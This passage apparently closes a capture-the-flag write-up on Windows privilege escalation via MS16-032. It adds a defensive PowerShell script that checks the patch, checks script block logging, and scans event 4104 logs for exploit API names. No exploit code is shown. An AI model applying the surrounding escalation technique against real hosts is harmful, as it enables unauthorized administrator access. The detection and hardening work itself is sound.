You can now navigate through the target system as an administrator to obtain the root.txt flag.
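From the defender's side, the exploit run above leaves two useful lessons: the box was vulnerable because the MS16-032 fix was missing, and the Metasploit module dropped a PowerShell script into the user's Temp folder, executed it, and deleted it again. The following script is an added example (it is not part of the original write-up or of Metasploit) that an administrator could run on a Windows host to check both points. It assumes local administrator rights, PowerShell 3.0 or later, and that KB3139914 is the security update that shipped with the MS16-032 bulletin; the API names it searches for (NtImpersonateThread, CreateProcessWithLogonW, DuplicateToken) are taken from the exploit output shown above.

```powershell
# Added example: MS16-032 exposure and PowerShell-logging check for one host.
# Assumes: run as local administrator, PowerShell 3.0+, and that KB3139914 is
# the MS16-032 security update. Not part of the original write-up.

param(
    # How far back to look for PowerShell script block events (constructed default).
    [int]$Hours = 24
)

# 1. Patch state. Get-HotFix returns nothing when the update is absent.
$kb      = 'KB3139914'
$patched = [bool](Get-HotFix -Id $kb -ErrorAction SilentlyContinue)
$os      = Get-CimInstance -ClassName Win32_OperatingSystem
Write-Output ("OS: {0} (build {1})" -f $os.Caption, $os.BuildNumber)
Write-Output ("MS16-032 fix {0} installed: {1}" -f $kb, $patched)

# 2. Is script block logging on? The exploit script is deleted from disk after
#    use, so event 4104 in the PowerShell Operational log is often the only
#    record of what actually ran.
$sblPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
$sbl     = Get-ItemProperty -Path $sblPath -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
$sblOn   = ($null -ne $sbl) -and ($sbl.EnableScriptBlockLogging -eq 1)
Write-Output ("Script block logging enabled: {0}" -f $sblOn)

# 3. Hunt recent 4104 events for the token-manipulation APIs the exploit calls.
$patterns = @('NtImpersonateThread', 'CreateProcessWithLogonW', 'DuplicateToken')
$since    = (Get-Date).AddHours(-$Hours)
$filter   = @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = $since
}
$hits = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
    Where-Object {
        $msg = $_.Message
        ($patterns | Where-Object { $msg -match $_ }).Count -gt 0
    }
Write-Output ("Suspicious 4104 events in the last {0}h: {1}" -f $Hours, @($hits).Count)
foreach ($h in $hits) {
    Write-Output ("  {0}  {1}" -f $h.TimeCreated, ($h.Message -split "`n")[0])
}

# 4. Leftover script files in any user's Temp folder. The module cleans up
#    after itself on success, so anything still present deserves a look.
$leftovers = Get-ChildItem -Path 'C:\Users\*\AppData\Local\Temp\*.ps1' -ErrorAction SilentlyContinue
foreach ($f in $leftovers) {
    Write-Output ("  Leftover script: {0} ({1})" -f $f.FullName, $f.LastWriteTime)
}

# Summary line for quick triage.
if (-not $patched) { Write-Warning "Host is missing $kb; apply the MS16-032 update." }
if (-not $sblOn)   { Write-Warning "Enable PowerShell script block logging to capture in-memory scripts." }
```

On an unpatched Server 2012 R2 host like Optimum the first warning fires; on a host where script block logging is on, a run of the module shows up as one or more 4104 events whose first line contains the API names above, even though the .ps1 file itself is gone by the time anyone looks.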
